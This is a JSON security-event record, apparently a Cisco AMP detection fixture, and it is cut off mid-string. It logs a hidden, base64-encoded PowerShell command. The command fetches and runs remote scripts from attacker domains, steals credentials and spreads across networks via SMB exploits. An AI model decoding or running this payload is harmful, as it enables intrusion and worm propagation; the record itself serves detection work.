-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAd